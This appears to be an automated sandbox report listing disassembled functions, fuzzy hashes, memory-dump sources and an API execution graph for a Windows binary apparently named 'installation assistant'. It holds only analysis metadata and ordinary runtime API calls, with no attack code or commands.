                                                          • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                                          • Instruction Fuzzy Hash: 9081AE72A012099BDF00CF94C994BDEB7F5AF54348F2AC069E818AF641D775E945CBA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog3_
                                                          • String ID: 8Q
                                                          • API String ID: 2427045233-4022487301
                                                          • Opcode ID: 0f5e23da3342bf198f49f5004a60debbf9ef4aea01a3fa67cc9076ba5547ed36
                                                          • Instruction ID: 112fa967ae7571fc308711b331e58333ee64c62c08bc92f90347605d9fef096b
                                                          • Opcode Fuzzy Hash: 0f5e23da3342bf198f49f5004a60debbf9ef4aea01a3fa67cc9076ba5547ed36
                                                          • Instruction Fuzzy Hash: 2071C274D093169BDB108B95C980BFEBBF5EF0D318F164229E92067A80DB71B845CB60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @$hfJ
                                                          • API String ID: 3519838083-1391159562
                                                          • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                                          • Instruction ID: 4ea581d31b9f160edc2889c03817d9353fcb4b66d3984f1c8fb64bf880ddf4f3
                                                          • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                                          • Instruction Fuzzy Hash: D0914A74910248EFCB14DF99C884ADEFBF8BF18308F90451EE555A7A50D774AA89CB20
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C118C5D
                                                            • Part of subcall function 6C11761A: __EH_prolog.LIBCMT ref: 6C11761F
                                                            • Part of subcall function 6C117A2E: __EH_prolog.LIBCMT ref: 6C117A33
                                                            • Part of subcall function 6C118EA5: __EH_prolog.LIBCMT ref: 6C118EAA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: WZJ
                                                          • API String ID: 3519838083-1089469559
                                                          • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                          • Instruction ID: 0c1250c1d5e52385b23fda9efe7a85b61b4a90926d8c62bf0f5dbfafea0f6eb1
                                                          • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                          • Instruction Fuzzy Hash: FC818D31D04258DFDF15DFA8D490BDDB7B4AF19318F1080AAE91267B90DB346E49CBA0
                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 6BF92A76
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: Jbx$Jbx
                                                          • API String ID: 4194217158-1161259238
                                                          • Opcode ID: e0501a24b684408b6f91fb14f8027b4a7d3f638d6392cc07c273d6d8bc72e6d7
                                                          • Instruction ID: d6cbcd82296b15b790890add865d8f497c49dffb017dfcf949b34b46751c330c
                                                          • Opcode Fuzzy Hash: e0501a24b684408b6f91fb14f8027b4a7d3f638d6392cc07c273d6d8bc72e6d7
                                                          • Instruction Fuzzy Hash: 3D51F4B39002049FDB14DF68E8806EEBBF5EF89314F14846DE8499B351D336E985CB92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: <dJ$Q
                                                          • API String ID: 3519838083-2252229148
                                                          • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                                          • Instruction ID: 73231e2b51cf09b7f8fe5abb4dbeef4b84412f1dd036f3be192c023053be699e
                                                          • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                                          • Instruction Fuzzy Hash: DC51A475904249EFCF10DF98C8909EDF7B1FF49358F10862EE521ABA50D739A98ACB14
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: $D^J
                                                          • API String ID: 3519838083-3977321784
                                                          • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                                          • Instruction ID: df53d317ed95af33122646a56f570c474991e5519c506a30d43d88a0e74113bc
                                                          • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                                          • Instruction Fuzzy Hash: 38413BE0A0C5906ED722CE29D450BEDBBE19F26248F18817CC49247F85DB6D5A8BC395
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C0E46D6), ref: 6C0DD01B
                                                          • __dosmaperr.LIBCMT ref: 6C0DD022
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr
                                                          • String ID: 8Q
                                                          • API String ID: 1659562826-4022487301
                                                          • Opcode ID: ea60a4e5d8e7aa5f2cab4f62e6394a9190369d06afa3a37f28196cb9061383fe
                                                          • Instruction ID: a2795aa49771d67048e7e8a882c8340be3f69c5a4c5b7cbc69aa7345fe5bc995
                                                          • Opcode Fuzzy Hash: ea60a4e5d8e7aa5f2cab4f62e6394a9190369d06afa3a37f28196cb9061383fe
                                                          • Instruction Fuzzy Hash: 5C4197716043A4AFDB119F68C880BED7FE5EF46344F658258F8808B642D371BD06CB92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: X&L$p|J
                                                          • API String ID: 3519838083-2944591232
                                                          • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                                          • Instruction ID: 3a622096589343cbefa02e21836c75651125a2172601402812059d70f41b5574
                                                          • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                                          • Instruction Fuzzy Hash: 92317D35695125CBD700DF5CDD01BEE77B1EB22F2CF11112AD918A3EE1CB609AC6CA58
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: 0|J$`)L
                                                          • API String ID: 3519838083-117937767
                                                          • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                          • Instruction ID: b520ec9eb6e84cac70288c7f75c9874d17536bdf8eef3e302402ddaca56d12d7
                                                          • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                          • Instruction Fuzzy Hash: 35419231605785EFDF128F60C490BEABBE2FF55208F04442EE46A57750CB766945CB91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: __aulldiv
                                                          • String ID: 3333
                                                          • API String ID: 3732870572-2924271548
                                                          • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                                          • Instruction ID: cbfb12a61bd41034fa063a9b15c79311ebe0398471a2f93d286cd8ed52612aec
                                                          • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                                          • Instruction Fuzzy Hash: AA2146B1900744AED7308FA98880B5BBAFDFF55758F10891FA185D7A40DB70E9448BA5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @$LuJ
                                                          • API String ID: 3519838083-205571748
                                                          • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                          • Instruction ID: 4d6dd58909168e71b4325fda5e4b8ff071135486d88481da5b90a9c81a479523
                                                          • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                          • Instruction Fuzzy Hash: 9F01A1B2E01249DADB10DF9988906AEF7B4FF65318F40942EE06DE3A40C3345904CB55
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @$xMJ
                                                          • API String ID: 3519838083-951924499
                                                          • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                                          • Instruction ID: 61f2f69eecc81830fceae254d99b8800821703a4afe46a5d515b7943cf659e3c
                                                          • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                                          • Instruction Fuzzy Hash: 51117C71A00209DBCB00DF99C4A059EB7B4FF59348B50C86EE469E7B01D7389A05CFA6
                                                          APIs
                                                          • _free.LIBCMT ref: 6C0DDD49
                                                          • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C0DA63A,?,00000004,?,4B42FCB6,?,?,6C0CF78C,4B42FCB6,?), ref: 6C0DDD85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: AllocHeap_free
                                                          • String ID: 8Q
                                                          • API String ID: 1080816511-4022487301
                                                          • Opcode ID: 652ca45f5bb6703e4e5579b31cd70b891d78aba6cc3b8bd9edb551f8729bc602
                                                          • Instruction ID: 9cf0026e03580855b02e577096cdf8004fdcb2cca32ad95eb297dc8ce1872ceb
                                                          • Opcode Fuzzy Hash: 652ca45f5bb6703e4e5579b31cd70b891d78aba6cc3b8bd9edb551f8729bc602
                                                          • Instruction Fuzzy Hash: DDF04F32645319769F211E6AA844B9E37E89FC3B68B274115E9249BA90DB30F40189F1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prologctype
                                                          • String ID: |zJ
                                                          • API String ID: 3037903784-3782439380
                                                          • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                                          • Instruction ID: 374b762902f8195ce1a09b79f93dca34444faf029e0f3718a2cd4a33033a7ad9
                                                          • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                                          • Instruction Fuzzy Hash: 7FE06532605520DBE715DF48D81179DF3A4FF54B28F51405F9416A7A41CBB1A8078795
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prologctype
                                                          • String ID: <oJ
                                                          • API String ID: 3037903784-2791053824
                                                          • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                                          • Instruction ID: 483708e70d7b279d3262af73ec05a0934f12f3c5730b282f7de40b8cf74ece64
                                                          • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                                          • Instruction Fuzzy Hash: 98E0ED36A15110DBDB089F08D820BDEF7A4EF52724F12015EE021A3B42CBB9A8508A80
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @ K$DJ$T)K$X/K
                                                          • API String ID: 0-3815299647
                                                          • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                                          • Instruction ID: 58bb9663e3b4780ec3c8ba2497b345de2f2aa0da884dc025a289399a3ff49415
                                                          • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                                          • Instruction Fuzzy Hash: C391DFB46053059FCF00DFA4C4507EE73A2EF5130CFA4881AC8765BB85DB79A9AACB51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D)K$H)K$P)K$T)K
                                                          • API String ID: 0-2262112463
                                                          • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                                          • Instruction ID: 7e99f677b11316a0829db5dc2e033ba2961095fea22eede71beb41eb2dc6138f
                                                          • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                                          • Instruction Fuzzy Hash: 6A51C0B1A042099BCF01CF9CD840BDEB7B1AF1531CF50445AEC7167A91DB76A9BACB90

                                                          Execution Graph

                                                          Execution Coverage:4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0.3%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:31
                                                          execution_graph 73221 b18eb1 73226 b18ed1 73221->73226 73224 b18ec9 73227 b18edb __EH_prolog 73226->73227 73235 b19267 73227->73235 73231 b18efd 73240 b0e5f1 free ctype 73231->73240 73233 b18eb9 73233->73224 73234 ad1e40 free 73233->73234 73234->73224 73236 b19271 __EH_prolog 73235->73236 73241 ad1e40 free 73236->73241 73238 b18ef1 73239 b1922b free CloseHandle GetLastError ctype 73238->73239 73239->73231 73240->73233 73241->73238 73245 b05475 73250 ad2fec 73245->73250 73249 b054bb 73251 ad2ffc 73250->73251 73255 ad2ff8 73250->73255 73251->73255 73301 ad1e0c 73251->73301 73256 b0c911 73255->73256 73257 b0c926 GetTickCount 73256->73257 73258 b0c92f 73256->73258 73257->73258 73259 b0c96d 73258->73259 73262 b0cb64 73258->73262 73332 ad2ab1 strcmp 73258->73332 73259->73262 73307 b0c86a 73259->73307 73262->73249 73264 b0c9ce 73264->73262 73315 ad27bb 73264->73315 73265 b0c95b 73265->73259 73333 ad3542 wcscmp 73265->73333 73269 b0ca0a 73270 b0ca21 73269->73270 73271 ad286d 5 API calls 73269->73271 73278 ad286d 5 API calls 73270->73278 73294 b0cb10 73270->73294 73273 b0ca16 73271->73273 73272 b0c9e2 73272->73269 73335 ad286d 73272->73335 73342 ad28fa malloc _CxxThrowException free memcpy _CxxThrowException 73273->73342 73281 b0ca40 73278->73281 73280 b0cb59 73354 b0cb92 malloc _CxxThrowException free 73280->73354 73284 ad2fec 3 API calls 73281->73284 73287 b0ca4e 73284->73287 73343 ad2033 73287->73343 73288 b0cb50 73291 ad27bb 3 API calls 73288->73291 73289 b0cb49 73353 ad1f91 fflush 73289->73353 73291->73280 73321 b0cb74 73294->73321 73295 ad2fec 3 API calls 73298 b0ca6a 73295->73298 73298->73295 73299 ad2033 10 API calls 73298->73299 73300 b0caf5 73298->73300 73350 ad3599 memmove 73298->73350 73351 ad3402 malloc _CxxThrowException free memmove _CxxThrowException 73298->73351 73299->73298 73352 ad28fa malloc _CxxThrowException free memcpy _CxxThrowException 73300->73352 73302 ad1e1c malloc 73301->73302 73303 ad1e15 73301->73303 73304 ad1e3e 73302->73304 73305 ad1e2a _CxxThrowException 73302->73305 73303->73302 73306 ad1e40 free 73304->73306 73305->73304 73306->73255 73308 b0c88c __aulldiv 73307->73308 73309 b0c8d3 strlen 73308->73309 73310 b0c900 73309->73310 73311 b0c8f1 73309->73311 73312 ad28a1 5 API calls 73310->73312 73311->73310 73313 ad286d 5 API calls 73311->73313 73314 b0c90c 73312->73314 73313->73311 73314->73264 73334 ad2ab1 strcmp 73314->73334 73316 ad27c7 73315->73316 73317 ad27e3 73315->73317 73316->73317 73318 ad1e0c ctype 2 API calls 73316->73318 73317->73272 73319 ad27da 73318->73319 73355 ad1e40 free 73319->73355 73322 b0cb7c strcmp 73321->73322 73323 b0cb1c 73321->73323 73322->73323 73323->73280 73324 b0c7d7 73323->73324 73325 b0c7ea 73324->73325 73327 b0c849 73324->73327 73330 b0c7fe fputs 73325->73330 73356 ad25cb malloc _CxxThrowException free _CxxThrowException ctype 73325->73356 73326 b0c85a fputs 73326->73288 73326->73289 73327->73326 73357 ad1f91 fflush 73327->73357 73330->73327 73332->73265 73333->73259 73334->73264 73358 ad1e9d 73335->73358 73338 ad28a1 73339 ad28b0 73338->73339 73339->73339 73363 ad267f 73339->73363 73341 ad28bf 73341->73269 73342->73270 73344 ad203b 73343->73344 73345 ad2045 73344->73345 73346 ad2054 73344->73346 73373 ad421e malloc _CxxThrowException free _CxxThrowException _CxxThrowException 73345->73373 73374 ad37ff 9 API calls 73346->73374 73349 ad2052 73349->73298 73350->73298 73351->73298 73352->73294 73353->73288 73354->73262 73355->73317 73356->73330 73357->73326 73359 ad1ead 73358->73359 73360 ad1ea8 73358->73360 73359->73338 73362 ad263c malloc _CxxThrowException free memcpy _CxxThrowException 73360->73362 73362->73359 73364 ad26c2 73363->73364 73365 ad2693 73363->73365 73364->73341 73366 ad26c8 _CxxThrowException 73365->73366 73368 ad26bc 73365->73368 73367 ad26dd 73366->73367 73370 ad1e0c ctype 2 API calls 73367->73370 73372 ad2595 malloc _CxxThrowException free memcpy ctype 73368->73372 73371 ad26ea 73370->73371 73371->73341 73372->73364 73373->73349 73374->73349 73375 b569f0 free 73376 ae1368 73378 ae136d 73376->73378 73379 ae138c 73378->73379 73382 b67d80 WaitForSingleObject 73378->73382 73385 b0f745 73378->73385 73389 b67ea0 SetEvent GetLastError 73378->73389 73383 b67d8e GetLastError 73382->73383 73384 b67d98 73382->73384 73383->73384 73384->73378 73386 b0f74f __EH_prolog 73385->73386 73390 b0f784 73386->73390 73388 b0f765 73388->73378 73389->73378 73391 b0f78e __EH_prolog 73390->73391 73399 ae12d4 73391->73399 73394 ae12d4 4 API calls 73395 b0f7d4 73394->73395 73396 b0f871 73395->73396 73407 b56b23 VirtualAlloc 73395->73407 73408 adc4d6 73395->73408 73396->73388 73400 ae1327 73399->73400 73401 ae12e7 73399->73401 73400->73394 73402 ae12ef _CxxThrowException 73401->73402 73403 ae1304 73401->73403 73402->73403 73414 ad1e40 free 73403->73414 73405 ae130b 73406 ad1e0c ctype 2 API calls 73405->73406 73406->73400 73407->73396 73412 adc4e9 73408->73412 73409 adc6f3 73409->73396 73412->73409 73413 adc695 memmove 73412->73413 73415 ae111c 73412->73415 73420 ae11b4 73412->73420 73413->73412 73414->73405 73417 ae1130 73415->73417 73416 ae115f 73416->73412 73417->73416 73425 add331 73417->73425 73429 adb668 73417->73429 73421 ae11c1 73420->73421 73422 ae11eb 73421->73422 73465 b1ae7c 73421->73465 73470 b1af27 73421->73470 73422->73412 73427 add355 73425->73427 73426 add374 73426->73417 73427->73426 73428 adb668 10 API calls 73427->73428 73428->73426 73437 adb675 73429->73437 73430 adb864 73448 ad7b7c 73430->73448 73433 adb8aa GetLastError 73434 adb6aa 73433->73434 73434->73417 73435 adb81b 73435->73434 73439 adb839 memcpy 73435->73439 73436 adb7e7 73436->73430 73440 ad7731 5 API calls 73436->73440 73437->73430 73437->73434 73437->73435 73437->73436 73441 adb7ad 73437->73441 73442 adb811 73437->73442 73452 ad7731 73437->73452 73461 ad7b4f ReadFile 73437->73461 73439->73434 73443 adb80d 73440->73443 73441->73437 73447 adb8c7 73441->73447 73460 b56a20 VirtualAlloc 73441->73460 73462 adb8ec GetLastError 73442->73462 73443->73430 73443->73442 73447->73434 73449 ad7b89 73448->73449 73463 ad7b4f ReadFile 73449->73463 73451 ad7b9a 73451->73433 73451->73434 73453 ad775c SetFilePointer 73452->73453 73454 ad7740 73452->73454 73455 ad7780 GetLastError 73453->73455 73458 ad77a1 73453->73458 73454->73453 73456 ad778c 73455->73456 73455->73458 73464 